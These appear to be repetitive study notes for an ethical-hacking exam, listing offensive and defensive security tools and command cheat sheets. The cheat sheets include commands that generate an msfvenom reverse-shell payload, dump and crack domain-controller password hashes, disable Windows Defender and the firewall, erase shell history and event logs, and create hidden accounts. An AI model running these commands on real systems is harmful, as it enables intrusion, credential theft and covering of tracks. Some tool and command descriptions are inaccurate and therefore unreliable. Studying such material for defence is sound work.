OpenVAS is a framework of several services and tools offering a comprehensive and

powerful vulnerability scanning and vulnerability management solution.

John the Ripper is a password cracking tool, that can be used in multiple operating
systems such as Unix, Windows, etc. It is helpful in detecting weak passwords in
Unix environment. Besides several crypt(3) password hash types most commonly found
on various Unix systems, supported out of the box are Windows LM hashes, plus lots
of other hashes and ciphers in the community-enhanced version.

Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests
against web servers for multiple items, including over 6700 potentially dangerous
files/programs, checks for outdated versions of over 1250 servers, and version
specific problems on over 270 servers. It also checks for server configuration
items such as the presence of multiple index files, HTTP server options, and will
attempt to identify installed web servers and software.

Havij is an automated SQL Injection tool that helps penetration testers to find and
exploit SQL Injection vulnerabilities on a web page.

Octoparse: Octoparse offers automatic data extraction, as it quickly scrapes web

data without coding and turns web pages into structured data. As shown in the
screenshot, attackers use Octoparse to capture information from webpages, such as
text, links, image URLs, or html code

Infoga: used for gathering email account information (IP, hostname, country, etc.)

Splint: to detect the common security vulnerabilities including buffer overflows.

Maltego: to determine the relationships and real-world links between people, groups
of people, organizations, websites, Internet infrastructure, documents.

OllyDbg: OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft®

Windows®. Its emphasis on binary code analysis makes it particularly useful when
the source is unavailable. It debugs multithread applications and attaches to
running programs. It recognizes complex code constructs, such as a call to jump to
the procedure

BeRoot: to check common misconfigurations to find a way to escalate privilege

Dependency Walker: for troubleshooting system errors related to loading and

executing modules. It detects many common application problems, such as missing
modules, invalid modules, import/export mismatches, circular dependency errors,
etc.

Hashcat: Hashcat is a cracker compatible with multiple OSs and platforms and can
perform multi-hash (MD4, 5; SHA – 224, 256, 384, 512; RIPEMD-160; etc.), multi-
device password cracking.

Secure Shell Bruteforcer: It is a password cracking tool that allows you to reset
unknown or lost Windows local administrator, domain administrator, and other user
account passwords.

Audio Spyware: to record sound onto a computer.

OmniHide Pro: to hide any secret file within an innocuous image, video, music file,
etc.

DeepSound: to hide/extract any secret data in/from audio files (WAV and FLAC). In
addition, it can encrypt secret files, thereby enhancing security.
Fiddler: for performing web-application security tests such as the decryption of
HTTPS traffic and manipulation of requests using a MITM decryption technique.

CxSAST: Checkmarx CxSAST is a unique source-code analysis solution that provides

tools for identifying, tracking, and repairing technical and logical flaws in
source code, such as security vulnerabilities, compliance issues, and business
logic problems.

PowerView: Attackers perform Active Directory (AD) enumeration to extract sensitive

information such as users, groups, domains, and other resources from the target AD
environment. Attackers enumerate AD using PowerShell tools such PowerView.

AlienVault USM: AlienVault Unified Security Management (USM) offers powerful threat
detection, incident response, and compliance management across cloud, on-premises,
and hybrid environments.

THC-Hydra: is a network logon cracker that supports many different services, such
as IPv6 and Internationalized RFC 4013.

Medusa: Medusa is password-cracking tool.

linpostexp: The linpostexp tool obtains detailed information on the kernel, which
can be used to escalate privileges on the target system.

Dependency Walker: Dependency Walker is useful for troubleshooting system errors

related to loading and executing modules. It detects many common application
problems, such as missing modules, invalid modules, import/export mismatches,
circular dependency errors, etc.

Dylib Hijack Scanner: Dylib Hijack Scanner (DHS) is a simple utility that will scan
your computer for applications that are either susceptible to dylib hijacking or
have been hijacked.

DPAT: DPAT is a Python script that generates password use statistics from password
hashes dumped from a domain controller (DC) and a password crack file such as
hashcat.pot generated using the hashcat tool during password cracking.

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

Scranos: Scranos is a trojanized rootkit that masquerades as cracked software or a

legitimate application, such as anti-malware, a video player, or an ebook reader,
to infect systems and perform data exfiltration that damages the reputation of the
target and steals intellectual property.

StegoStick: StegoStick is a steganographic tool that allows attackers to hide any

file in any other file.

OmniHide Pro: OmniHide PRO allows you to hide any secret file within an innocuous
image, video, music file, etc.

Bloodhound: Bloodhound is a JavaScript web application that is built on top of

Linkurious and compiled using Electron, with a Neo4j database fed by a C# data
collector. Attackers use Bloodhound to easily identify complex attack paths in AD
environments.

Mimikatz: Mimikatz allows attackers to pass Kerberos TGT to other computers and
sign in using the victim’s ticket. The tool also helps in extracting plaintext
passwords, hashes, PIN codes, and Kerberos tickets from memory.

zsteg: The zsteg tool is used to detect stegano-hidden data in PNG and BMP image
files.

Veracode: to detect buffer overflow vulnerabilities.

GhostPack Seatbelt: to collect host information including PowerShell security

settings, Kerberos tickets, and items in Recycle Bin.

Robber: to find executables prone to DLL hijacking.

Dylib Hijack Scanner: scan PC to dylib hijacking or have been hijacked.

crontab in Linux:
crontab <Filename> :Installs or modifies the crontab file
crontab -l :Displays currently running crontabs
crontab -r :Deletes the crontab file
crontab -r <Username> :Deletes the crontab of the specified user
crontab -e : Schedules software updates/modifies the crontab file of the
current user
crontab -u <Username> -e :Modifies the crontab of the specified user

nmap -T4 –A <target IP/network>: Attackers use this Nmap scan commands to identify
the RPC service running on the network.

showmount -e <Target IP Address>: Attackers uses this command to check if any share
is available for mounting on the target host.

sudo mount -t nfs <Target IP Address>:/<Share Directory> /tmp/nfs: Attackers uses

this command to mount the nfs directory on the target host.

ldns-walk @<IP of DNS Server> <Target domain>: Attackers use this query to
enumerate a target domain using the DNS server to obtain DNS record files.

NetVizor: NetVizor comes with an unparalleled task recording feature-set that in

secret records everything employees do on the network. Chats, keystrokes and
emails, site and on-line search activity, application usage, file usage, uploads
and downloads, computer software setups, and web traffic represent simply a
sampling of the NetVizor activity recording capabilities.

Stream Armor: Stream Armor is a tool used to discover hidden ADSs and clean them
completely from your system. Its advanced auto analysis, coupled with an online
threat verification mechanism, helps you eradicate any ADSs that may be present

GFI LanGuard: GFI LanGuard scans for, detects, assesses, and rectifies security
vulnerabilities in a network and its connected devices. This is done with minimal
administrative effort. It scans the operating systems, virtual environments, and
installed applications through vulnerability check databases

CCleaner: CCleaner is a system optimization, privacy, and cleaning tool. It allows

attackers to remove unused files and cleans traces of Internet browsing details
from the target PC. With this tool, an attacker can very easily erase his/her
tracks

pwdump7: pwdump7 is an application that dumps the password hashes (one-way

functions or OWFs) from NT’s SAM database. pwdump extracts LM and NTLM password
hashes of local user accounts from the Security Account Manager (SAM) database
OllyDbg: OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft®
Windows®. Its emphasis on binary code analysis makes it particularly useful when
the source is unavailable. It debugs multithread applications and attaches to
running programs. It recognizes complex code constructs, such as a call to jump to
the procedure

BeRoot: BeRoot is a post-exploitation tool to check common misconfigurations to

find a way to escalate privilege.

Snow: Snow is a program for concealing messages in text files by appending tabs and
spaces to the ends of lines, and for extracting messages from files containing
hidden messages. The user hides the data in the text file by appending sequences of
up to seven spaces, interspersed with tabs. This usually allows three bits to be
stored every eight columns. There is an alternative encoding scheme that uses
alternating spaces and tabs to represent 0s and 1s.

njRAT: njRAT is a RAT with powerful data-stealing capabilities. In addition to

logging keystrokes, it can access a victim's camera, stealing credentials stored in
browsers, uploading and downloading files, performing process and file
manipulations, and viewing the victim's desktop.

PoisonIvy: PoisonIvy gives the attacker practically complete control over the
infected computer. The PoisonIvy remote administration tool is created and
controlled by a PoisonIvy management program or kit. The PoisonIvy kit consists of
a graphical user interface, and the backdoors are small (typically, <10 kB).

Necurs: is a distributor of many pieces of malware, most notably Dridex and Locky.
It delivers some of the worst banking Trojans and ransomware threats in batches of
millions of emails at a time, and it keeps reinventing itself. Necurs is
distributed by spam e-mails and downloadable content from questionable/illegal
sites. It is indirectly responsible for a significant portion of cyber-crime.

Hildeagard: is cloud malware designed to exploit misconfigured kubelets in a

Kubernetes cluster for infecting all the containers in the Kubernetes environment

Purple Fox Rootkit: The Purple Fox rootkit enables attackers to conceal malware on
targeted devices, making it difficult for security solutions to detect and remove
the malware. It is a sophisticated malware attack that targets Windows machines and
spreads its infection from one machine to another. The Purple Fox rootkit can be
distributed via a fake malicious Telegram installer.

Microdots: A microdot is text or an image considerably condensed in size (with the

help of a reverse microscope), up to one page in a single dot, to avoid detection
by unintended recipients. Microdots are usually circular, about one millimeter in
diameter, but are changeable into different shapes and sizes.

Computer-based methods: A computer-based method makes changes to digital carriers

to embed information foreign to the native carriers. Communication of such
information occurs in the form of text, binary files, disk and storage devices, and
network traffic and protocols, and can alter the software, speech, pictures, videos
or any other digitally represented code for transmission.

Invisible ink: Invisible ink, or “security ink,” is one of the methods of technical
steganography. It is used for invisible writing with colorless liquids and can
later be made visible by certain pre-negotiated manipulations such as lighting or
heating. For example, if you use onion juice and milk to write a message, the
writing will be invisible, but when heat is applied, it turns brown and the message
becomes visible.
Spread spectrum: This technique is less susceptible to interception and jamming. In
this technique, communication signals occupy more bandwidth than required to send
the information. The sender increases the band spread by means of code (independent
of data), and the receiver uses a synchronized reception with the code to recover
the information from the spread spectrum data.

NTFS - Alternate Data Streams to hide file using NTFS:

C:\SecretFile.txt >C:\LegitFile.txt:SecretFile.txt
File is kept in C drive where SecretFile.txt file is hidden inside
LegitFile.txt file)

more < C:\SecretFile.txt

To read secret file

Dreambot: can also be embedded as a macro in an MS word document and sent to

victims via spam emails. If this Trojan gets into the victim’s machine, it will
covertly create registry keys and processes, and attempt to connect to multiple
malicious C2C servers.

MoonBounce: concealed within UEFI firmware in the SPI flash that is scheduled to be
executed at a specific time.

GlitchPOS: is a fake cat game that is embedded in malware and not displayed at the
time of execution. It is a Trojan that masquerades as a cat game.

Restorator: Restorator is a utility for editing Windows resources in applications

and their components (e.g., files with .exe, .dll, .res, .rc, and .dcr extensions).
It allows you to change, add, or remove resources such as text, images, icons,
sounds, videos, versions, dialogs, and menus in nearly all programs. Using this
tool, one can achieve translation/localization, customization, design improvement,
and development.

File-System Commands:
find / -perm -3000 -ls 2> /dev/null
Discovers SUID-executable binaries

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls
2> /dev/null
Discovers world-writable files

chmod o-w file

Disables write access to a file

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls
2> /dev/null
Discovers world-writable directories

find / -name "*.txt" -ls 2> /dev/null

Discovers .txt files on the system

sudo -l
Displays the list of permitted and forbidden commands

openssl s_client -connect <hostname>:<port> -showcerts

Displays all certificates’ details

keytool -list -v -keystore keystore.jks

Displays contents of keystore files and alias names
WMIC Commands:
wmic os where Primary='TRUE' reboot : Reboots Windows
wmic service get name,displayname,pathname,startmode >
wmic_service.txt :Retrieves the service name, path of the executable, etc.
wmic /node:"" product get name,version,vendor : Displays the details of the
installed software
wmic cpu get : Retrieves the processor’s details
wmic useraccount get name,sid : Retrieves login names and their SIDs

Sysinternals Commands:
psexec -i \\<RemoteSystem> cmd
Establishes an interactive CMD with a remote system

psexec -i \\<RemoteSystem> -c file.exe

Copies file.txt from the local machine to a remote computer

psexec -i -d -s c:\windows\regedit.exe
Retrieves the contents of security keys and SAM

psexec -i \\<RemoteSystem> ipconfig /all

Displays a remote system’s network information

Service Commands:
sc queryex type=service state=all
Lists all the available services

sc queryex type=service state=all | find /i "Name of the service: myService"

Lists details about the specified service

net start or stop

Starts/stops a network service

netsh firewall show state

Displays the current firewall state

netsh firewall show config

Displays firewall settings

netsh advfirewall set currentprofile state off

Turns off the firewall service for the current profile

netsh advfirewall set allprofiles state off

Turns off the firewall service for all profiles

Information-Gathering Commands:
ps -ef : Displays the current process along with its process ID (PID)
Mount : Attaches a file system to the directory tree structure
route -n : Displays host/network names in numeric form
/sbin/ifconfig -a : Displays network configuration details
cat /etc/crontab : Displays running cron jobs
ls -la /etc/cron.d : Displays the software package used for the specified
cron job
cat /etc/exports : Displays directories that can be exported to NFS clients
cat /etc/redhat* /etc/debian* /etc/*release : Displays the OS version details
ls /etc/rc* : Lists bootup services
egrep -e '/bin/(ba)?sh' /etc/passwd :Displays all the users who have shell
access
cat ~/.ssh/ : Displays SSH relationships and login details
cat /dev/null > ~.bash_history && history –c && exit : This command deletes the
complete command history of the current and all other shells and exits the shell.

history -w: This command only deletes the history of the current shell, whereas the
command history of other shells remains unaffected

export HISTSIZE=0: This command disables the Bash shell from saving history.
HISTSIZE determines the number of commands to be saved, which is set to 0.

history –c: This command is useful in clearing the stored history

adslist.exe: dslist.exe is third-party utilities to show and manipulate hidden

streams.

Cipher.exe: Cipher.exe is an in-built Windows command-line tool that can be used to

securely delete data by overwriting them to avoid recovery in the future. This
command also assists in encrypting and decrypting data in NTFS partitions

Auditpol.exe: Auditpol.exe is the command-line utility tool to change audit

security settings at the category and sub-category levels.

ATTRIB.exe: ATTRIB.exe displays or changes the file attributes of a victim’s files

so that the attacker can access them.

CMD/Shell:
touch MaliciousFile.txt
Use the touch command to create a file within the hidden folder

net user <UserName> /active:yes

Run the following command to activate the account for exploitation

net user <UserName> /active:no

Run this command to hide the account when it is not required in the Windows
system

net user <UserName> /add

Attackers can create a hidden user account on the victim system using the
following command

mkdir .HiddenMaliciousFiles
Use the following command to create a new hidden folder in a Linux system

attrib +h +s +r <FolderName>
Attackers use this command with administrator privileges to hide any file or
folder in a Windows system

Auditpol.exe: to change Audit Security settings at the category and sub-category

levels.

Clear_Event_Viewer_Logs.bat/clearlogs.exe: to wipe out the logs of the target

system.

SECEVENT.EVT: can manipulate the log files with the help of: SECEVENT.EVT
(security): failed logins, accessing files without privileges
SYSEVENT.EVT (system): Driver failure, things not operating correctly
APPEVENT.EVT (applications)

Regedit:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AppKey
stores the hotkeys.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
is responsible for file extension association.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
RecentDocs key maintains a list of recently opened or saved files via Windows
Explorer-style dialog boxes.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
MountPoints2 stores the network locations.

hashcat -a 3 -m 0 md5_hashes.txt ?l?l?l?d?d?d

Run the above command to crack passwords that contain six characters, in which the
first three are lowercase alphabets and the last three characters are numbers.

run post/windows/gather/arp_scanner RHOSTS <target subnet range>

An attacker uses the above command to detect live hosts in the target network:

usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Run the above command to find the exact offset of the random bytes in the EIP
register

msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port>

EXITFUNC=thread -f c -a x86 -b “\x00”
Run the above msfvenom command to generate the shellcode.

./hashcat.bin -m 3000 -a 3 users.ntds -1 ?a ?1?1?1?1?1?1?1 –increment

Run the above command to crack LM hashes of users.ntds in the hashcat.pot format.

john --format=LM users.ntds

To crack LM hashes using John the Ripper, run the above command.

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q

Run the above command to dump the password hashes from the domain controller (DC).
This requires sufficient space in the C drive to store the output.

Set-MpPreference -DisableRealtimeMonitoring $true

Attackers can disable the security monitoring option using the above command before
performing enumeration using the PowerView tool.

PowerView:
Get-DomainSID
Retrieves the security ID (SID) of the current domain.

Get-NetDomain
Retrieves information related to the current domain including domain
controllers (DCs).

(Get-DomainPolicy)."SystemAccess"
Retrieves information related to the policy configurations of the domain’s
system access.

Get-NetGroup -UserName <"username">

Retrieves the group name of the specified domain user

C:\Windows\system32>nltest /domain_trusts: Attackers use this utility to collect

information about trust domains and use the gathered information to add a domain
trust or modify the settings of existing domain trusts to escalate privileges
through Kerberoasting and pass-the-ticket attacks.

C:\Windows\Panther\ UnattendGC\: Unattended installs allow attackers to deploy

Windows OSs without the intervention of an administrator. In Windows systems, the
Unattend.xml file is stored in the above location.

\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\: Attackers use this path to access the domain

group policies and modify them to perform unintended activities such as creating a
new account, disabling or modifying internal tools, ingress tool transfer, unwanted
service executions, and modifying the policy to extract passwords in plaintext.

C:\Windows\System32\osk.exe: Attackers create persistence and escalate privileges

by embedding and running malicious code within Windows accessibility features. On-
screen keyboard is an accessibility feature abused by attackers.

***********
Wireshark: Wireshark lets you capture and interactively browse the traffic running
on a computer network.

Vindicate: is an LLMNR/NBNS/mDNS spoofing detection toolkit for network

administrators. Security professionals use this tool to detect name service
spoofing.

Robber: Tool for finding executables prone to DLL hijacking

BuzzSumo: BuzzSumo’s advanced social search engine finds the most shared content
for a topic, author, or domain. It shows the shared activity across all the major
social networks including Twitter, Facebook, LinkedIn, Google Plus, and Pinterest.

GFI LanGuard: GFI LanGuard scans for, detects, assesses, and rectifies security
vulnerabilities in a network and its connected devices.

OpenVAS: OpenVAS is a framework of several services and tools that offer a

comprehensive and powerful vulnerability scanning and vulnerability management
solution.

Spokeo: Attackers can use the Spokeo people search online service to search for
people belonging to the target organization. Using this service, attackers obtain
information such as phone numbers, email addresses, address history, age, date of
birth, family members, social profiles, and court records.

Netcraft: Attackers use various online tools such as Netcraft, Shodan, and Censys
to detect the operating system used at the target organization.

Photon: Attackers can use tools such as Photon to retrieve archived URLs of the
target website from archive.org.

Nikto: Nikto is an Open Source (GPL) web server scanner that performs comprehensive
tests against web servers for multiple items, including over 6700 potentially
dangerous files or programs, checks for outdated versions of over 1250 servers, and
checks for version specific problems on over 270 servers.

KFSensor: KFSensor is a Windows-based honeypot intrusion detection system (IDS). It

acts as a honeypot designed to attract and detect hackers and worms by simulating
vulnerable system services and Trojans.

Recon-ng: Recon-ng is a full-featured reconnaissance framework designed to provide

a powerful environment to conduct web-based reconnaissance quickly and thoroughly.
It assists attackers in gathering information from public source-code repositories.

Reverse Lookup: The Reverse Lookup tool performs a reverse IP lookup by taking an
IP address and locating a DNS PTR record for that IP address
ShellPhish: ShellPhish is a phishing tool used to phish user credentials from
various social networking platforms such as Instagram, Facebook, Twitter, and
LinkedIn.

NodeXL: Attackers use various tools such as Gephi, SocNetV, and NodeXL to construct
and analyze social networks and obtain critical information about the target
organization/users.

Mention: Mention is an online reputation tracking tool that helps attackers in

monitoring the web, social media, forums, and blogs to learn more about the target
brand and industry.

HTTrack Web Site Copier: HTTrack is an offline browser utility. It downloads a

website from the Internet to a local directory and recursively builds all the
directories including HTML, images, and other files from the web server on another
computer.

Burp Suite: Burp Suite is an integrated platform for performing security testing of
web applications. Its various tools work together to support the entire testing
process, from initial mapping and analysis of an application's attack surface to
finding and exploiting security vulnerabilities.

indeed.com, dice.com, and linkup.com are websites that provide online job services.
Financial services such as Google Finance, MSN Money, Yahoo Finance, and

Investing.com can provide a large amount of useful information such as the market
value of a company’s shares, company profile, competitor details, stock exchange
rates, corporate press releases, financial reports along with news, and blog search
articles about corporations.

Metagoofil: Metagoofil extracts metadata of public documents (pdf, doc, xls, ppt,
docx, pptx, and xlsx) belonging to a target company.

Sherlock: To search a vast number of social networking sites for a target username.
This tool helps the attacker to locate the target user on various social networking
sites along with the complete URL.

BeRoot: BeRoot is a post-exploitation tool to check for common misconfigurations

which can allow an attacker to escalate their privileges.

OpUtils: SNMP enumeration protocol that helps to monitor, diagnose and trouble
shoot the IT resources.

Sublist3r: Sublist3r is a Python script designed to enumerate the subdomains of

websites using OSINT. It enables you to enumerate subdomains across multiple
sources at once.

SearchSploit: Attackers can also use SearchSploit, which is a command-line search

tool for Exploit-DB that allows taking a copy of the Exploit database for remote
use. It allows attackers to perform detailed offline searches through their locally
checked-out copy of the repository.

Spyse: Spyse is an online platform that can be used to collect and analyze
information about devices and websites available on the Internet.

DroidSniff: DroidSniff is an Android app for security analysis in wireless networks

that can capture Facebook, Twitter, LinkedIn, and other accounts.
MITRE ATT&CK framework: MITRE ATT&CK is a globally accessible knowledge base of
adversary tactics and techniques based on real-world observations.

GitLab : Source code–based repositories are online services or tools available on

internal servers or can be hosted on third-party websites such as GitHub, GitLab,
SourceForge, and BitBucket. These sites contain sensitive data related to
configuration files, private Secure Shell (SSH) and Secure Sockets Layer (SSL)
keys, source-code files, dynamic libraries, and software tools developed by
contributors, which can be leveraged by attackers to launch attacks on the target
organization.

Netcraft: Netcraft provides Internet security services, including anti-fraud and

anti-phishing services, application testing, and PCI scanning.

theHarvester: theHarvester is a tool designed to be used in the early stages of a

penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet.

usufy.py – Checks for a user profile on up to 290 different platforms

mailfy.py – Check for the existence of a given email

searchfy.py – Performs a query on the platforms in OSRFramework

domainfy.py – Checks for the existence of domains

phonefy.py – Checks for the existence of a given series of phones

entify.py – Uses regular expressions to extract entities

L0phtCrack: L0phtCrack is a tool designed to audit passwords and recover

applications. It recovers lost Microsoft Windows passwords with the help of a
dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the
strength of the password.

Nagios: Nagios provides complete monitoring of SAN solutions – including disk

usage, directories, file count, file presence, file size, RAID array status and
more.

THC-Hydra: THC Hydra is a parallelized login cracker that can attack numerous
protocols. This tool is a proof-of-concept code that provides researchers and
security consultants the possibility to demonstrate how easy it would be to gain
unauthorized remote access to a system.

FOCA Features:
Web Search - Searches for hosts and domain names through URLs associated with
the main domain. Each link is analyzed to extract information from its new host and
domain names.

DNS Search - Checks each domain to ascertain the host names configured in NS,
MX, and SPF servers to discover the new host and domain names.

IP Resolution - Resolves each host name by comparison with the DNS to obtain
the IP address associated with this server name. To perform this task accurately,
the tool performs analysis against the organization’s internal DNS.

PTR Scanning - Finds more servers in the same segment of a determined

address; IP FOCA executes a PTR log scan.
 Bing IP - Launches FOCA, which is a search process for new domain names
associated with that IP address for each IP address discovered.

Common Names - Perform dictionary attacks against the DNS.

OllyDbg: OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft®

Windows®. Its emphasis on binary code analysis makes it particularly useful when
the source is unavailable. It debugs multithread applications and attaches to
running programs. It recognizes complex code constructs, such as a call to jump to
the procedure

Dependency Walker: Dependency Walker is useful for troubleshooting system errors

related to loading and executing modules. It detects many common application
problems, such as missing modules, invalid modules, import/export mismatches,
circular dependency errors, etc.

RPCScan: RPCScan communicates with RPC services and checks misconfigurations on NFS
shares.

KeyGrabber: A KeyGrabber hardware keylogger is an electronic device capable of

capturing keystrokes from a PS/2 or USB keyboard. It comes in various forms, such
as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.

ntpdate parameters and their respective functions

-B Force the time to always be slewed
-b Force the time to be stepped
-d Enable debugging mode
-q Query only; do not set the clock

NetScanTools Pro: NetScanTools Pro’s SMTP Email Generator tool tests the process of
sending an email message through an SMTP server.

Wireshark: It is packet analyzer used for network examination, protocol inspection

and trouble shooting.

JXplorer: It is java-based application used to search any LDAP directory.

Snmpcheck: Its goal is to automate the process of gathering information on any

device with SNMP support (Windows, Unix-like, network appliances, printers, etc.)

Professional Toolset: DNS interrogation tools such as Professional Toolset

(https://tools.dnsstuff.com) and DNS Records (https://network-tools.com) enable the
user to perform DNS footprinting.

Infoga: Infoga is a tool used for gathering email account information from
different public sources and it checks if an email was leaked using the
haveibeenpwned.com API.

Octoparse: Octoparse offers automatic data extraction, as it quickly scrapes web

data without coding and turns web pages into structured data.

Metagoofil: Metagoofil extracts metadata of public documents (pdf, doc, xls, ppt,
docx, pptx, and xlsx) belonging to a target company.

Secure Shell Bruteforcer: It is a password cracking tool that allows you to reset
unknown or lost Windows local administrator, domain administrator, and other user
account passwords. In the case of forgotten passwords, it even allows users instant
access to their locked computer without reinstalling Windows.
Audio Spyware: Audio spyware is a sound surveillance program designed to record
sound onto a computer. The attacker can silently install the spyware on the
computer, without the permission of the computer user and without sending them any
notification.

OmniHide Pro: OmniHide PRO allows you to hide any secret file within an innocuous
image, video, music file, etc.

DeepSound: DeepSound allows you to hide any secret data in audio files (WAV and
FLAC). It also allows you to extract secret files directly from audio CD tracks. In
addition, it can encrypt secret files, thereby enhancing security.

DPAT: DPAT is a Python script that generates password use statistics from password
hashes dumped from a domain controller (DC) and a password crack file such as
hashcat.pot generated using the hashcat tool during password cracking.

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

Scranos: Scranos is a trojanized rootkit that masquerades as cracked software or a

legitimate application, such as anti-malware, a video player, or an ebook reader,
to infect systems and perform data exfiltration that damages the reputation of the
target and steals intellectual property.

StegoStick: StegoStick is a steganographic tool that allows attackers to hide any

file in any other file.

./hashcat.bin -m 3000 -a 3 users.ntds -1 ?a ?1?1?1?1?1?1?1 –increment

Run the above command to crack LM hashes of users.ntds in the hashcat.pot format.

john --format=LM users.ntds

To crack LM hashes using John the Ripper, run the above command.

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q

Run the above command to dump the password hashes from the domain controller (DC).
This requires sufficient space in the C drive to store the output.

Set-MpPreference -DisableRealtimeMonitoring $true

Attackers can disable the security monitoring option using the above command before
performing enumeration using the PowerView tool.

THC-Hydra: THC-Hydra is a network logon cracker that supports many different

services, such as IPv6 and Internationalized RFC 4013. It comes with a GUI and
supports HTTP proxy and SOCKS proxy.

Medusa: Medusa is password-cracking tool.

Hashcat: Hashcat is a cracker compatible with multiple OSs and platforms and can
perform multihash (MD4, 5; SHA – 224, 256, 384, 512; RIPEMD-160; etc.), multi-
device password cracking.

OllyDbg: It is a buffer overflow detection tool and is a 32-bit assembler-level

analyzing debugger for Microsoft® Windows®. Its emphasis on binary code analysis
makes it particularly useful when the source is unavailable.

Veracode: It is a buffer overflow detection tool that helps security professionals

to detect buffer overflow vulnerabilities.
GhostPack Seatbelt: Attackers use Seatbelt to collect host information including
PowerShell security settings, Kerberos tickets, and items in Recycle Bin. Using
Seatbelt, attackers perform security checks to find insecurities, which can be
exploited to launch active attacks on the host network.

Robber: Robber is an open-source tool that helps attackers to find executables

prone to DLL hijacking.

Dylib Hijack Scanner: Dylib Hijack Scanner (DHS) is a simple utility that will scan
your computer for applications that are either susceptible to dylib hijacking or
have been hijacked.

CCleaner: CCleaner is a system optimization, privacy, and cleaning tool. It allows

attackers to remove unused files and cleans traces of Internet browsing details
from the target PC. With this tool, an attacker can very easily erase his/her
tracks.

OpenStego: OpenStego is a steganography application that provides the following

functions.
Data Hiding: It can hide any data within a cover file (e.g., images)
Watermarking: Watermarking files (e.g., images) with an invisible signature. It can
be used to detect unauthorized file copying.

Vindicate: Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network

administrators. Security professionals use this tool to detect name service
spoofing. This tool helps them to quickly detect and isolate attackers on their
network. It is designed to detect the use of hacking tools such as Responder,
Inveigh, NBNSpoof, and Metasploit’s LLMNR, NBNS, and mDNS spoofers while avoiding
false positives

Sherlock: Attackers use Sherlock to search a vast number of social networking sites
for a target username. This tool helps the attacker to locate the target user on
various social networking sites along with the complete URL.

theHarvester: theHarvester is a tool designed to be used in the early stages of a

penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet. Attackers use this
tool to perform enumeration on the LinkedIn social networking site to find
employees of the target company along with their job titles.

Qualys VM: helps to continuously identify threats and monitor unexpected changes in
a network before they turn into breaches

Sherlock: Attackers use Sherlock to search a vast number of social networking sites
for a target username. This tool helps the attacker to locate the target user on
various social networking sites along with the complete URL.

Octoparse: Octoparse offers automatic data extraction, as it quickly scrapes web

data without coding and turns web pages into structured data. As shown in the
screenshot, attackers use Octoparse to capture information from webpages, such as
text, links, image URLs, or html code.

GrayFish Rootkit: GrayFish is a Windows kernel rootkit that runs inside the Windows
operating system and provides an effective mechanism, hidden storage and malicious
command execution while remaining invisible. It injects its malicious code into the
boot record which handles the launching of Windows at each step. It implements its
own Virtual File System (VFS) to store the stolen data and its own auxiliary
information.
Hardware/Firmware Rootkit: Hardware/firmware rootkits use devices or platform
firmware to create a persistent malware image in hardware, such as a hard drive,
system BIOS, or network card. The rootkit hides in firmware as the users do not
inspect it for code integrity. A firmware rootkit implies the use of creating a
permanent delusion of rootkit malware.

Boot Loader Level Rootkit: Boot loader level (bootkit) rootkits function either by
replacing or modifying the legitimate bootloader with another one.The boot loader
level (bootkit) can activate even before the operating system starts. So, the boot-
loader-level (bootkit) rootkits are serious threats to security because they can
help in hacking encryption keys and passwords.

EquationDrug Rootkit: EquationDrug is a dangerous computer rootkit that attacks the

Windows platform. It performs targeted attacks against various organizations and
arrives on the infected system by being downloaded and executed by the Trickler
dubbed "DoubleFantasy", covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It
allows a remote attacker to execute shell commands on the infected system.

Trojan.Gen: Trojan.Gen is a generic detection for many individual but varied

Trojans for which specific definitions have not been created. A generic detection
is used because it protects against many Trojans that share similar
characteristics.

Senna Spy Trojan Generator: This is a Trojan that comes hidden in malicious
programs. Once you install the source (carrier) program is installed, this Trojan
attempts to gain "root" access (administrator level access) to your computer
without your knowledge.

DarkHorse Trojan Virus Maker: DarkHorse Trojan Virus Maker is used to creates user-
specified Trojans by selecting from various options available. The Trojans created
to act as per the options selected while creating them. For e.g., if you choose the
option Disable Process, the Trojan disables all processes on the target system. The
screenshot in the slide shows a snapshot of Dark Horse Trojan Virus Maker that
displays its various available options.

Win32.Trojan.BAT: Win32.Trojan.BAT is a system-destructive trojan program. It will

crash the system by deleting files.

An attacker can use BitCrypter to encrypt and compress 32-bit executables and .NET
apps, without affecting their direct functionality. A Trojan or malicious software
piece can be encrypted onto a legitimate software to bypass firewalls and antivirus
software. BitCrypter supports a wide range of OSs from Windows XP to the latest
Windows 10.

Divergent: Divergent is a type of fileless malware that exploits NodeJS, which is a

program that executes JavaScript outside the browser. Using Divergent fileless
malware, attackers generate revenue by targeting corporate networks through click-
fraud attacks.

BotenaGo: The BotenaGo exploit kit written in the Go scripting language contains
over 30 variants of exploits and is cable of attacking millions of IoT and routing
devices worldwide. BotenaGo was first discovered in November 2021 and observed as
Mirai botnet malware by antivirus software. BotenaGo is successfully being used by
attackers in distributing DDoS functionalities by spreading payloads to victim
devices.

Process Monitor: Process Monitor is a monitoring tool for Windows that shows real-
time file system, registry, and process/thread activity.
